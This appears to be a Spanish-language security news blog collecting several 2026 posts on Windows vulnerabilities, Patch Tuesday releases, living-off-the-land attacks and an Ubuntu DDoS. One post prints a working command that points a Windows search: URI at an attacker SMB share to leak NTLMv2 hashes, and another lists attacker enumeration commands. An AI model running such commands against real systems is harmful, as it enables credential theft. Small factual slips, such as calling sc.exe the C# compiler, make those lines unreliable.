SAFE. Guía para proteger tu vida digital y tu privacidad
Showing posts with label sistema operativo. Show all posts
Showing posts with label sistema operativo. Show all posts

Jun 28, 2026

Microsoft extiende el soporte gratuito de ESU para Windows 10 hasta octubre de 2027

El 14 de octubre de 2025, Windows 10 llegó al final del soporte y Microsoft ya no brinda soporte técnico, actualizaciones de funciones o actualizaciones de seguridad para el sistema operativo a menos que esté ejecutando una versión LTSC de Windows.

Para aquellos que no pueden actualizar a Windows 11, Microsoft originalmente ofreció a los consumidores un año adicional de actualizaciones de seguridad si se inscribían en un programa gratuito de actualizaciones de seguridad extendidas (ESU) que expiraría el 12 de octubre de 2026.

Ahora, Microsoft ha extendido silenciosamente su programa gratuito de Actualizaciones de seguridad extendidas (ESU) de Windows 10 para consumidores por un año adicional, lo que permite que los dispositivos inscritos continúen recibiendo actualizaciones de seguridad hasta el 12 de octubre de 2027.

El cambio se realizó sin un anuncio formal y, en cambio, apareció en actualizaciones de la documentación ESU de Windows 10 de Microsoft y como una "nota del editor" de una publicación del blog Windows Experience publicada ayer.

"Nota del editor – 25 de junio de 2026 – Esta publicación se actualizó para reflejar que el programa de Actualizaciones de seguridad extendidas (ESU) de Windows 10 para dispositivos de uso personal se proporciona por un año adicional, con cobertura ahora disponible hasta el 12 de octubre de 2027", se lee en la publicación de blog actualizada.

Esta extensión brinda a los clientes más tiempo para realizar la transición a una nueva PC con Windows 11 mientras continúan recibiendo actualizaciones de seguridad críticas.

Los clientes empresariales también podrían inscribirse en el programa ESU por hasta tres años, lo que eleva el costo total por dispositivo a $427 durante ese período.

Cuando se le preguntó por qué se amplió el programa ESU gratuito, Microsoft compartió la siguiente declaración con BleepingComputer: "Entendemos que pasar a una nueva PC puede llevar tiempo. Como parte de nuestro compromiso continuo de ayudar a los clientes a mantenerse seguros durante la transición, el programa de actualizaciones de seguridad extendidas (ESU) de Windows 10 para dispositivos personales se ofrece por un año adicional", explicó Microsoft.

Los consumidores pueden seguir recibiendo seguridad ampliada de forma gratuita utilizando uno de estos métodos:

  • Pagando $30.
  • Hacer una copia de seguridad de su configuración de Windows en su cuenta de Microsoft.
  • Canjear 1000 puntos de recompensa de Microsoft.
  • Los usuarios del Espacio Económico Europeo pueden recibir ESU de forma gratuita iniciando sesión en Windows 10 con una cuenta de Microsoft.

Microsoft dice que una licencia ESU se puede usar en hasta 10 dispositivos asociados con la misma cuenta de Microsoft, y los usuarios ya inscritos permanecerán cubiertos automáticamente hasta la nueva fecha final de octubre de 2027.

La compañía señala que el programa ESU para consumidores es solo para dispositivos personales y no está disponible para sistemas unidos a dominios de Active Directory, Microsoft Entra o administrados a través de Mobile Device Management (MDM). Sin embargo, los dispositivos registrados en Microsoft Entra son elegibles.

Fuente: BC

Jun 4, 2026

Vulnerabilidad sin parchear en la URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2

Investigadores de ciberseguridad han revelado detalles de una vulnerabilidad sin parchear que podría explotarse para obtener el hash NTLMv2 de un usuario.

Como resultado, un atacante podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema, declarando que "solo los casos de gravedad Importante y Crítica cumplen con nuestros criterios para recibir soporte".

Al igual que en el caso de CVE-2026-33829, que afectaba al controlador de URI `ms-screensketch:` de la herramienta Recortes de Windows, la nueva vulnerabilidad detectada reside en el controlador de URI `search:`, según Huntress.

CVE-2026-33829 se refiere a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un atacante no autorizado.

"Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra URL, insertándolo en una página web o un correo electrónico", señaló Microsoft en su aviso de seguridad en aquel momento.

Si el usuario aprueba la apertura del enlace, la URL manipulada puede inducir al equipo a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como tal.

En concreto, el problema radicaba en que el controlador de URI de la Herramienta Recortes aceptaba un parámetro "filePath", no lo validaba y accedía a cualquier ruta UNC (Convención de Nombres Universales) que se le pasara. Esto, a su vez, podía activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

La vulnerabilidad recientemente descubierta logra el mismo objetivo final utilizando "search:" y "crumb=location:" en lugar de "filePath" con un comando como el siguiente:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"Utilizaba el mismo mecanismo de fuga NTLM, producía la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y la misma calificación de Moderada", afirmó Andrew Schwartz, investigador de Huntress. Cabe destacar que el uso del parámetro "crumb" para robar el hash (CVE-2023-35636) fue documentado por Varonis en febrero de 2024.

A falta de una solución, se recomienda bloquear el tráfico SMB saliente (TCP/445 y TCP/139) en los hosts que no lo necesiten, exigir la firma SMB para que los hashes capturados no puedan reenviarse a servicios internos y deshabilitar NTLM donde corresponda.

Actualización: Este repositorio contiene una herramienta automatizada en Bash diseñada para auditar y verificar de manera pasiva y controlada si los activos con sistema operativo Windows son vulnerables a la manipulación insegura del manejador de protocolo search:.

Fuente: THN

May 15, 2026

Zero-Days en Windows permiten eludir BitLocker y escalamiento de privilegios mediante CTFMON

Un investigador anónimo de ciberseguridad que reveló tres vulnerabilidades de Microsoft Defender ha vuelto a descubrir dos vulnerabilidades Zero-Days adicionales: una que permite eludir BitLocker y otra que provoca una escalamiento de privilegios en el Marco de Traducción Colaborativa de Windows (CTFMON).

El investigador, conocido en línea como Chaotic Eclipse y Nightmare-Eclipse, ha denominado a estos fallos de seguridad YellowKey y GreenPlasma, respectivamente.

El investigador describió YellowKey como "uno de los descubrimientos más increíbles que he encontrado", comparando la vulnerabilidad que permite eludir BitLocker con una puerta trasera, ya que el fallo solo está presente en el Entorno de Recuperación de Windows (WinRE), un marco integrado diseñado para solucionar y reparar problemas comunes de arranque del sistema operativo.

YellowKey afecta a Windows 11 y Windows Server 2022/2025. En términos generales, el método consiste en copiar archivos "FsTx" especialmente diseñados en una unidad USB o en la partición EFI, conectar la unidad USB al ordenador Windows objetivo con las protecciones BitLocker activadas, reiniciar en WinRE y acceder a la consola manteniendo pulsada la tecla CTRL.

"Creo que incluso a MSRC le llevará tiempo encontrar la causa raíz del problema. Nunca he logrado comprender por qué esta vulnerabilidad está tan bien oculta", explicó el investigador. "Además, TPM+PIN no soluciona el problema; la vulnerabilidad sigue siendo explotable".

El investigador de seguridad Will Dormann, en una publicación compartida en Mastodon, afirmó: "Logré reproducir [YellowKey] con una unidad USB conectada. Parece que los bits NTFS transaccionales de una unidad USB pueden eliminar el archivo winpeshl.ini en OTRA UNIDAD (X:). Y obtenemos una consola de cmd.exe con BitLocker desbloqueado en lugar del entorno de recuperación de Windows esperado".

"Si bien la elusión de BitLocker mediante TPM es interesante, creo que lo más importante aquí es que un directorio \System Volume Information\FsTx en un volumen tiene la capacidad de modificar el contenido de otro volumen cuando se reproduce", señaló Dormann. "Para mí, esto en sí mismo suena a vulnerabilidad".

La segunda vulnerabilidad detectada por Chaotic Eclipse es un caso de escalamiento de privilegios que podría explotarse para obtener una shell con permisos de SYSTEM. Surge como resultado de lo que se ha descrito como la creación arbitraria de secciones por parte de CTFMON de Windows.

La prueba de concepto (PoC) publicada está incompleta y carece del código necesario para obtener una shell completa de SYSTEM. En su forma actual, el exploit permite a un usuario sin privilegios crear objetos de sección de memoria arbitrarios dentro de directorios con permisos de escritura para SYSTEM, lo que podría permitir la manipulación de servicios o controladores privilegiados que confían implícitamente en esas rutas, ya que un usuario estándar no tiene acceso de escritura a dichas ubicaciones.

Chaotic Eclipse también prometió una "gran sorpresa" para Microsoft, coincidiendo con la próxima actualización de seguridad (Patch Tuesday) en junio de 2026.

Fuente: THN

May 7, 2026

"Tu mayor riesgo de seguridad no es el malware, sino aquello en lo que ya confías"

Durante años, la ciberseguridad se ha basado en una premisa simple: detectar malware y detener el ataque. Este modelo está empezando a fallar.

Los atacantes ya no dependen principalmente de archivos maliciosos o cargas útiles obvias. En cambio, recurren cada vez más a lo que ya existe en su entorno: herramientas de confianza, binarios nativos y utilidades administrativas legítimas. Estas se utilizan para moverse lateralmente, escalar privilegios y mantener la persistencia, a menudo sin activar las alertas de seguridad tradicionales.

¿El problema? La mayoría de las organizaciones no reconocen esta vulnerabilidad hasta que el daño ya está hecho. Esto es lo que realmente sucede en los entornos modernos y por qué los atacantes prefieren usar sus propias herramientas en su contra.

¿La herramienta más mal utilizada? Netsh.exe

Si bien las herramientas de bajo costo son un tema ampliamente tratado, la mayoría de los análisis previos se han basado en la experiencia, no en datos concretos. Estos datos se basan en el análisis de la frecuencia de uso de las herramientas, en lugar del daño que podrían causar. 

Lo que resultó evidente de inmediato es que las herramientas más utilizadas por los atacantes también lo son por los administradores. Los sospechosos habituales, como powershell.exe, wscript.exe y cscript.exe, estaban presentes. Sin embargo, uno de los hallazgos más sorprendentes fue que netsh.exe era la herramienta más utilizada indebidamente, apareciendo en un tercio de los ataques importantes. Si bien revisar la configuración del firewall es un paso inicial lógico para los atacantes, esto demuestra claramente cómo el análisis de datos puede revelar tendencias que los operadores humanos podrían pasar por alto instintivamente. Estas son las cinco herramientas más utilizadas indebidamente:

  • Netsh.exe: Los administradores utilizan esta utilidad de línea de comandos para la gestión de la configuración de red, incluyendo firewalls, interfaces y enrutamiento.
  • PowerShell.exe: Conocido como la "navaja suiza" de la administración de Windows, PowerShell es un intérprete de comandos y lenguaje de scripting versátil.
  • Reg.exe: Esta herramienta de línea de comandos permite a los administradores consultar, modificar, agregar o eliminar entradas del registro, y los ciberdelincuentes la utilizan con frecuencia para establecer persistencia. C
  • sc.exe: El compilador de C# de Microsoft es una herramienta de línea de comandos para compilar código fuente de C# en ensamblados ejecutables (archivos .exe) o bibliotecas de vínculos dinámicos (archivos .dll).
  • Rundll32.exe: Esta utilidad del sistema carga y ejecuta funciones exportadas desde archivos DLL. Se usa frecuentemente para ataques de carga lateral de DLL.

La popularidad de las herramientas entre los atacantes suele reflejar su popularidad entre los administradores legítimos. Esta tendencia general se mantuvo en la mayoría de los casos, pero surgieron algunas excepciones notables. En concreto, los ciberdelincuentes utilizan herramientas como mshta.exe, pwsh.exe y bitsadmin.exe, pero los administradores rara vez las usan.

Los ataques están diseñados para no parecer ataques.

Los ciberdelincuentes modernos no quieren destacar, sino pasar desapercibidos.

Los datos de más de 700.000 incidentes de alta gravedad muestran un patrón claro: el 84% de los ataques implican el uso indebido de herramientas legítimas para evitar ser detectados. Este enfoque, conocido como "aprovecharse de las herramientas existentes" (LOTL, por sus siglas en inglés), se ha convertido en la norma.

En lugar de introducir ejecutables maliciosos, los atacantes recurren a utilidades integradas como PowerShell, WMIC o Certutil, herramientas que ya son de confianza y ampliamente utilizadas por los equipos de TI. Su actividad imita fielmente las operaciones normales, lo que dificulta enormemente distinguir entre la administración legítima y el comportamiento malicioso.

Esto crea un punto ciego importante. Los equipos de seguridad ya no se limitan a buscar indicadores conocidos de compromiso, sino que intentan interpretar la intención basándose en el comportamiento, a menudo en tiempo real y sin el contexto completo.

Para cuando algo parece claramente sospechoso, el atacante suele estar ya bien posicionado dentro del entorno.

Tu superficie de ataque es mayor —y menos controlada— de lo que crees.

La mayoría de las organizaciones subestiman la exposición de su entorno.

Tomemos como ejemplo un equipo estándar con Windows 11. De fábrica, incluye cientos de binarios nativos, muchos de los cuales pueden utilizarse en ataques tipo LOTL (Load to Live). Estas herramientas gozan de confianza inherente, están profundamente integradas en el sistema operativo y, a menudo, son necesarias para un uso legítimo.

Esto plantea un dilema complejo:

  • Bloquearlas por completo puede interrumpir flujos de trabajo críticos para el negocio.
  • Supervisarlas de cerca puede generar un ruido abrumador.

Además, en muchos casos, las organizaciones carecen de visibilidad clara sobre dónde y cómo se puede acceder a estas herramientas.

Las investigaciones demuestran que hasta el 95% del acceso a herramientas potencialmente riesgosas es innecesario. En muchos entornos, los usuarios —y a veces las aplicaciones— tienen mucho más acceso del que realmente necesitan. A esto se suma que a menudo se permite a las herramientas realizar todas las funciones disponibles, incluidas aquellas que rara vez se utilizan en las operaciones diarias, pero que los atacantes explotan con frecuencia.

Cada permiso innecesario amplía la superficie de ataque. Cuando los atacantes pueden operar completamente dentro de los recursos ya disponibles, las defensas tradicionales se encuentran inmediatamente en desventaja.

La detección por sí sola ya no es suficiente.

Las tecnologías de detección no han fallado; han obligado a los atacantes a adaptarse.

Soluciones como EDR y XDR siguen siendo muy eficaces para identificar malware y comportamientos claramente anómalos. Pero cuando los atacantes operan con herramientas legítimas, la detección se vuelve mucho más ambigua. Los equipos de seguridad se preguntan: ¿Es este comando de PowerShell el esperado? ¿Es normal la ejecución de este proceso?

Al mismo tiempo, la velocidad de los ataques está aumentando.

Las campañas modernas, a menudo aceleradas por la automatización y la IA, pueden avanzar más rápido de lo que los equipos pueden investigar. Para cuando se valida una alerta, los atacantes ya pueden haber logrado moverse lateralmente y establecido persistencia.

Por eso, confiar únicamente en la detección ya no es suficiente. El reto no consiste solo en detectar las amenazas, sino en reducir las oportunidades que tienen los atacantes desde un principio.

La brecha de visibilidad: Lo que la mayoría de los equipos no ven

Comprender la superficie de ataque interna parece sencillo en teoría. En la práctica, rara vez se hace bien.

La mayoría de las organizaciones tienen dificultades para responder preguntas fundamentales:

  • ¿Qué herramientas son realmente accesibles en todo el entorno?
  • ¿Dónde el acceso es excesivo o innecesario?
  • ¿Cómo se traducen estos patrones de acceso en rutas de ataque reales y explotables?

Incluso cuando los equipos son conscientes del riesgo conceptualmente, cuantificarlo —y priorizar las acciones— es difícil. Esa falta de claridad es precisamente lo que permite que estas vulnerabilidades persistan.

De reactivo a proactivo

Cerrar esta brecha no comienza con la implementación de otra herramienta de seguridad. Comienza con la visibilidad.

La evaluación de la superficie de ataque interna proporciona una visión clara y basada en datos de cómo las herramientas de confianza pueden estar aumentando la exposición. Ayuda a identificar el acceso innecesario, resaltar el riesgo real y priorizar la remediación, sin interrumpir a los usuarios ni generar costos operativos adicionales.

Vea su entorno como lo ven los atacantes.

Las técnicas LOTL se están convirtiendo rápidamente en la norma, en lugar de la excepción. Esto cambia el enfoque de la seguridad.

Los riesgos más importantes ya no son externos ni desconocidos: ya están dentro de su entorno.

Comprender cómo los atacantes pueden moverse utilizando herramientas de confianza es el primer paso para limitar esas vías y detener un ataque antes de que se desarrolle por completo.

Para comprender mejor cómo se manifiesta este riesgo en entornos reales, Bitdefender ofrece una Evaluación Interna de la Superficie de Ataque gratuita: una forma práctica y sencilla de descubrir dónde las herramientas de confianza pueden estar trabajando en su contra.

Fuente: THN

May 1, 2026

Ubuntu interrumpido por ataque DDoS

Un grupo de hacktivistas se atribuyó la responsabilidad de la caída de la infraestructura pública de Ubuntu, la popular distribución del sistema operativo Linux, así como de Canonical, la empresa que desarrolla y mantiene el software. El ataque comenzó el jueves y continúa afectando a servicios esenciales para los usuarios de Ubuntu.

"La infraestructura web de Canonical está sufriendo un ataque transfronterizo sostenido y estamos trabajando para solucionarlo. Proporcionaremos más información a través de nuestros canales oficiales tan pronto como sea posible", declaró la empresa en su sitio web.

Los servicios impactados son los siguientes:

Se cree que los hacktivistas lanzaron un ataque de denegación de servicio distribuido (DDoS), un ataque rudimentario pero a menudo efectivo que consiste en saturar un objetivo con tráfico basura hasta sobrecargarlo o colapsarlo.

Los desarrolladores de Ubuntu han estado debatiendo el ataque en un foro no oficial de la comunidad, afirmando que afecta a la API de seguridad de Ubuntu y a varios sitios web de Ubuntu y Canonical. Según una publicación en un foro de inteligencia sobre amenazas, el ataque DDoS también ha impedido a los usuarios actualizar e instalar Ubuntu. TechCrunch verificó que las actualizaciones no se instalaron en un dispositivo de prueba con Ubuntu.

Los hacktivistas que se hacen llamar The Islamic Cyber Resistance in Iraq 313 Team afirmaron en su canal de Telegram ser los responsables del ataque DDoS. El grupo afirmó estar utilizando Beamed, un servicio de DDoS por encargo.

Este tipo de servicios, también conocidos como booters o stressers, permiten a cualquier persona pagar para lanzar ataques DDoS, incluso sin conocimientos técnicos ni la infraestructura necesaria para saturar los objetivos con tráfico falso. En este caso, el servicio de ataques DDoS por encargo afirma tener capacidad para realizar ataques de más de 3,5 Tbps, lo que representa aproximadamente la mitad del ancho de banda de un ciberataque que Cloudflare calificó el año pasado como el "mayor ataque DDoS jamás registrado".

Fuente: TechCrunch

Apr 17, 2026

TRES Zero-Days en Microsoft Defender explotadas activamente; dos siguen sin parche

Tres vulnerabilidades Zero-Days en Defender han sido explotadas desde el 10 de abril de 2026, lo que permite escalamiento de privilegios y ataques de denegación de servicio (DoS), obligando al aislamiento de los sistemas afectados.

Huntress advierte que ciberdelincuentes están explotando tres fallos de seguridad recientemente revelados en Microsoft Defender para obtener privilegios elevados en sistemas comprometidos. Esta actividad implica la explotación de tres vulnerabilidades con nombre en clave BlueHammerRedSun y UnDefend, todas ellas publicadas como vulnerabilidades de día cero por un investigador conocido como Chaotic Eclipse (también conocido como Nightmare-Eclipse) en respuesta a la (mala) gestión de Microsoft en el proceso de divulgación de vulnerabilidades.

Si bien BlueHammer y RedSun son vulnerabilidades de escalamiento de privilegios locales (LPE) que afectan a Microsoft Defender, UnDefend puede utilizarse para provocar una denegación de servicio (DoS) y bloquear las actualizaciones de definiciones.

Microsoft abordó BlueHammer como parte de las actualizaciones de Patch Tuesday de esta semana, pero las otras vulnerabilidades aún no cuentan con una solución. La vulnerabilidad se está rastreando con el identificador CVE-2026-33825.

En una serie de publicaciones compartidas en X, Huntress afirmó haber observado la explotación de las tres vulnerabilidades en la práctica. BlueHammer se ha estado utilizando como arma desde el 10 de abril de 2026, seguido del uso de exploits de prueba de concepto (PoC) de RedSun y UnDefend el 16 de abril.

"Estas invocaciones se produjeron tras el uso de comandos de enumeración típicos: whoami /priv, cmdkey /list, net group y otros que indican actividad de un atacante mediante el teclado", añadió.

El proveedor de ciberseguridad afirmó haber tomado medidas para aislar a la organización afectada y prevenir futuras explotaciones.

Fuente: THN

Apr 15, 2026

Actualizaciones de seguridad de ABRIL para todas las empresas

El martes parches de abril de 2026 de Microsoft ha dejado actualizaciones de seguridad para 169 vulnerabilidades, incluyendo 2 Zero-Days. Este Patch Tuesday también aborda ocho vulnerabilidades "críticas", 7 de las cuales son vulnerabilidades de ejecución remota de código y la otra es una vulnerabilidad de denegación de servicio.

El número de errores en cada categoría de vulnerabilidad se detalla a continuación:

  • 93 vulnerabilidades de elevación de privilegios
  • 13 vulnerabilidades de omisión de funciones de seguridad
  • 20 vulnerabilidades de ejecución remota de código
  • 21 vulnerabilidades de divulgación de información
  • 10 vulnerabilidades de denegación de servicio
  • 9 vulnerabilidades de suplantación de identidad

Entre las 169 vulnerabilidades también se incluyen cuatro CVE no emitidas por Microsoft que afectan a AMD (CVE-2023-20585), Node.js (CVE-2026-21637), Windows Secure Boot (CVE-2026-25250) y Git para Windows (CVE-2026-32631). Estas actualizaciones se suman a las 78 vulnerabilidades que se han corregido en su navegador Edge basado en Chromium desde la actualización lanzada el mes pasado.

Para obtener más información sobre las actualizaciones no relacionadas con la seguridad publicadas hoy, puede consultar nuestros artículos específicos sobre las actualizaciones acumulativas the Windows 11 KB5083769 & KB5082052 y la actualizaciuón extendida de Windows 10 KB5082200.

Dos vulnerabilidades de día cero y fallos en Microsoft Office

Esta actualización corrige dos vulnerabilidades de día cero: una divulgada públicamente y la otra explotada activamente en ataques.

La vulnerabilidad de día cero explotada activamente es:

  • CVE-2026-32201 (CVSS 6.5). Vulnerabilidad de suplantación de identidad en Microsoft SharePoint Server, que fue explotada en ataques. "Una validación de entrada incorrecta en Microsoft Office SharePoint permite a un atacante no autorizado suplantar identidades en una red", explica Microsoft.

La explotación activa de la vulnerabilidad CVE-2026-32201 ha llevado a la CISA añadirla al catálogo de Vulnerabilidades Explotadas Conocidas (KEV).

La vulnerabilidad de día cero divulgada públicamente es:

  • CVE-2026-33825 (CVSS 8.5). Vulnerabilidad de elevación de privilegios en Microsoft Defender que otorgaba privilegios de SYSTEM y se conoció públicamente com BlueHammer. La compañía ha solucionado la vulnerabilidad en la actualización 4.18.26050.3011 de la plataforma antimalware Microsoft Defender, que se descargará automáticamente en los sistemas. Microsoft reconoce el descubrimiento de esta vulnerabilidad por parte de Zen Dodd y Yuanpei XU (HUST) de Diffract.

Vulnerabilidad Cero Clics explotada activamente

La vulnerabilidad de suplantación de identidad, CVE-2026-32202 (CVSS 4.3), podría permitir a un atacante acceder a información confidencial. "Un fallo en el mecanismo de protección de Windows Shell permite a un atacante no autorizado realizar suplantación de identidad a través de una red", señala Microsoft en una alerta. "El atacante tendría que enviar a la víctima un archivo malicioso que esta tendría que ejecutar".

Aunque el gigante tecnológico no compartió detalles sobre la actividad de explotación, el investigador de seguridad de Akamai, Maor Dahan, a quien se le atribuye el descubrimiento y la notificación del fallo, afirmó que la vulnerabilidad de cero clics se origina en un parche incompleto para la CVE-2026-21510.

Esta última ha sido explotada por un grupo estatal ruso identificado como APT28 (también conocido como Fancy Bear, Forest Blizzard, GruesomeLarch y Pawn Storm) junto con la CVE-2026-21513 como parte de una cadena de exploits: CVE-2026-21510 (CVSS 8.8) y CVE-2026-21513 (CVSS 8.8), solucionadas en febrero.

Ejecución remota de código en Microsoft Office

Microsoft también ha corregido varios errores de ejecución remota de código en Microsoft Office (Word y Excel) que podían ejecutarse a través del panel de vista previa o al abrir documentos maliciosos. Por lo tanto, se recomienda a los usuarios que actualicen Microsoft Office lo antes posible, especialmente si suelen recibir archivos adjuntos.

Vulnerabilidad en IKE (IPSec / VPN)

Una de las vulnerabilidades más graves es la ejecución remota de código que afecta a las extensiones del servicio de intercambio de claves de Internet (IKE) de Windows. Identificada como CVE-2026-33824, esta vulnerabilidad tiene una puntuación CVSS de 9.8.

"Para explotarla, un atacante debe enviar paquetes especialmente diseñados a un equipo Windows con IKE v2 habilitado, lo que podría permitir la ejecución remota de código", declaró Adam Barnett, ingeniero jefe de software de Rapid7. "Las vulnerabilidades que permiten la ejecución remota de código sin autenticación en sistemas Windows modernos son relativamente raras; de lo contrario, veríamos más vulnerabilidades que se propagan por internet. Sin embargo, dado que IKE proporciona servicios seguros de negociación de túneles, por ejemplo, para VPN, está necesariamente expuesto a redes no confiables y es accesible en un contexto de preautorización".

Un atacante no autenticado puede enviar paquetes especialmente diseñados a una máquina Windows con IKE versión 2 habilitado para potencialmente permitir la ejecución remota de código. Entre las medidas de mitigación adicionales se incluye el bloqueo del tráfico entrante en los puertos UDP 500 y 4500 si IKE no está en uso.

Walters señaló que esta vulnerabilidad representa una seria amenaza para los entornos empresariales, especialmente para aquellos que dependen de VPN o IPsec para comunicaciones seguras. La explotación exitosa de esta vulnerabilidad podría comprometer completamente el sistema, permitiendo a atacantes robar datos confidenciales, interrumpir operaciones o moverse lateralmente por la red.

La falta de interacción del usuario hace que esto sea especialmente peligroso para los sistemas conectados a internet. Su baja complejidad de ataque y su impacto total en el sistema lo convierten en un objetivo ideal para su rápida utilización como arma. Los sistemas conectados a internet que ejecutan servicios IKEv2 corren un riesgo particular, y retrasar la implementación del parche aumenta la exposición a posibles ataques generalizados.

Vulnerabilidad de BitLocker

Microsoft publicó oficialmente actualizaciones de seguridad para solucionar una importante vulnerabilidad en Windows BitLocker. Esta vulnerabilidad, identificada como CVE-2026-27913 (CVSS 7.7), fue descubierta por el investigador de seguridad Alon Leviev en colaboración con el equipo STORM de Microsoft. El fallo representa un riesgo considerable para las arquitecturas de seguridad de los dispositivos empresariales. Sin embargo, actualmente no hay evidencia de explotación activa ni código de explotación disponible públicamente.

La causa principal de CVE-2026-27913 reside en la forma en que el componente Windows BitLocker procesa y gestiona ciertos datos de entrada. Según el aviso de seguridad integral de Microsoft, la vulnerabilidad se deriva directamente de una validación de entrada incorrecta, clasificada como debilidad CWE-20.

El exploit requiere acceso local a la máquina objetivo, lo que significa que el atacante debe estar físicamente cerca o tener acceso local al sistema. Esta debilidad sistémica permite a un atacante no autorizado eludir fácilmente las protecciones críticas del sistema y eludir completamente el Arranque Seguro (Secure Boot). La ejecución del exploit tiene una baja complejidad y no requiere interacción del usuario ni privilegios elevados para tener éxito.

La documentación de Microsoft confirma que la vulnerabilidad afecta a un amplio espectro de entornos Windows Server actualmente en uso. Las plataformas afectadas incluyen Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019 y Windows Server 2022. Además, la vulnerabilidad está presente tanto en instalaciones estándar completas de escritorio como en instalaciones optimizadas de Server Core en todas estas versiones.

Actualizaciones para otras compañías


Mar 11, 2026

Actualizaciones de seguridad de MARZO para todas las empresas

Microsoft lanzó el martes parches para un conjunto de 84 nuevas vulnerabilidades de seguridad que afectan a varios componentes de software, incluidas dos Zero-Days que figuran como conocidas públicamente.

Microsoft lanzó la actualización de seguridad extendida KB5078885 de Windows 10 para corregir las vulnerabilidades del martes de parches de marzo de 2026, incluidos los dos Zero-Days y un problema que impide que algunos dispositivos se apaguen. Microsoft ya no lanza nuevas funciones para Windows 10 y la actualización KB5078885 solo contiene correcciones de seguridad y correcciones de errores introducidas por actualizaciones de seguridad anteriores.

Microsoft también ha lanzado actualizaciones acumulativas de Windows 11 KB5079473 y KB5078883 para las versiones 25H2/24H2 y 23H2 para corregir vulnerabilidades de seguridad, errores y agregar nuevas funciones. Las actualizaciones son obligatorias ya que contienen los parches de seguridad del martes de parches de marzo de 2026 para vulnerabilidades descubiertas en meses anteriores.

La cantidad de errores en cada categoría de vulnerabilidad se enumera a continuación:

  • 46 Vulnerabilidades de elevación de privilegios
  • 2 vulnerabilidades de omisión de funciones de seguridad
  • 18 vulnerabilidades de ejecución remota de código
  • 10 vulnerabilidades de divulgación de información
  • 4 vulnerabilidades de denegación de servicio
  • 4 vulnerabilidades de suplantación de identidad

Las correcciones se suman a 10 vulnerabilidades que se han solucionado en su navegador Edge basado en Chromium desde el lanzamiento de la actualización del martes de parches de febrero de 2026.

Los dos días cero divulgados públicamente son CVE-2026-26127 (CVSS: 7,5), una vulnerabilidad de denegación de servicio en .NET, y CVE-2026-21262 (CVSS: 8,8), una vulnerabilidad de elevación de privilegios en SQL Server.

La vulnerabilidad con la puntuación CVSS más alta en la actualización de este mes es una falla crítica de ejecución remota de código. CVE-2026-21536 (CVSS: 9,8), según Microsoft, se ha mitigado por completo y no se requiere ninguna acción por parte de los usuarios. A la plataforma autónoma de descubrimiento de vulnerabilidades XBOW, impulsada por inteligencia artificial (IA), se le atribuye el mérito de descubrir e informar el problema.

"Este mes, más de la mitad (55%) de todos los CVE de Patch Tuesday fueron errores de escalamiento de privilegios, y de ellos, seis fueron clasificados como más probables de explotación en el componente de gráficos de Windows, la infraestructura de accesibilidad de Windows, el kernel de Windows, el servidor SMB de Windows y Winlogon", dijo Satnam Narang, ingeniero senior de investigación de Tenable. "Sabemos que estos errores suelen ser utilizados por actores de amenazas como parte de una actividad posterior al compromiso, una vez que ingresan a los sistemas a través de otros medios (ingeniería social, explotación de otra vulnerabilidad)".

La falla de escalamiento de privilegios de Winlogon (CVE-2026-25187, CVSS: 7,8), en particular, aprovecha la resolución inadecuada de enlaces para obtener privilegios del SYSTEM. El investigador de Google Project Zero, James Forshaw, ha sido reconocido por informar sobre la vulnerabilidad.

"La falla permite a un atacante autenticado localmente con privilegios bajos explotar una condición de seguimiento de enlace en el proceso Winlogon y escalar a privilegios del SYSTEM", dijo Jacob Ashdown, ingeniero de ciberseguridad de Immersive. "La vulnerabilidad no requiere interacción del usuario y tiene una baja complejidad de ataque, lo que la convierte en un objetivo sencillo una vez que un atacante logra afianzarse".

Otra vulnerabilidad a destacar es CVE-2026-26118 (CVSS: 8,8), un error de falsificación de solicitudes del lado del servidor en el servidor Azure Model Context Protocol (MCP) que podría permitir a un atacante autorizado elevar los privilegios en una red. "Un atacante podría aprovechar este problema enviando entradas especialmente diseñadas a una herramienta de servidor Azure Model Context Protocol (MCP) que acepte parámetros proporcionados por el usuario", dijo Microsoft.

La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener los permisos asociados con la identidad administrada del servidor MCP. Luego, el atacante podría aprovechar este comportamiento para acceder o realizar acciones en cualquier recurso al que la identidad administrada esté autorizada a acceder.

Microsoft también ha solucionado dos errores de ejecución remota de código (CVE-2026-26110 y CVE-2026-26113), ambos en Microsoft Office, que pueden explotarse a través del panel de vista previa. Por tanto, los usuarios deben priorizar la actualización de la aplicación.

Entre los errores de gravedad crítica resueltos por Microsoft se encuentra una falla de divulgación de información en Excel. Registrado como CVE-2026-26144 (CVSS: 7,5), se ha descrito como un caso de secuencias de comandos entre sitios que se produce como resultado de una neutralización inadecuada de la entrada durante la generación de una página web. Un atacante que explotara la deficiencia podría causar que el modo Copilot Agent extraiga datos como parte de un ataque sin clic.

Los parches llegan cuando Microsoft dijo que está cambiando el comportamiento predeterminado de Windows Autopatch al permitir actualizaciones de seguridad con parches activos para ayudar a proteger los dispositivos a un ritmo más rápido. "Este cambio en el comportamiento predeterminado llega a todos los dispositivos elegibles en Microsoft Intune y a aquellos que acceden al servicio a través de Microsoft Graph API a partir de la actualización de seguridad de Windows de mayo de 2026", dijo Redmond. "Aplicar correcciones de seguridad sin esperar a que se reinicie puede hacer que las organizaciones alcancen un 90% de cumplimiento en la mitad del tiempo, mientras usted mantiene el control".

La vulnerabilidad CVE-2026-23669 es un fallo en el servicio de cola de impresión que está siendo utilizado para inyectar código malicioso en redes corporativas sin interacción del usuario. La vulnerabilidad permite saltarse los controles de integridad del sistema y ejecutar procesos con privilegios de administrador.

Actualización hotpatch fuera de ciclo

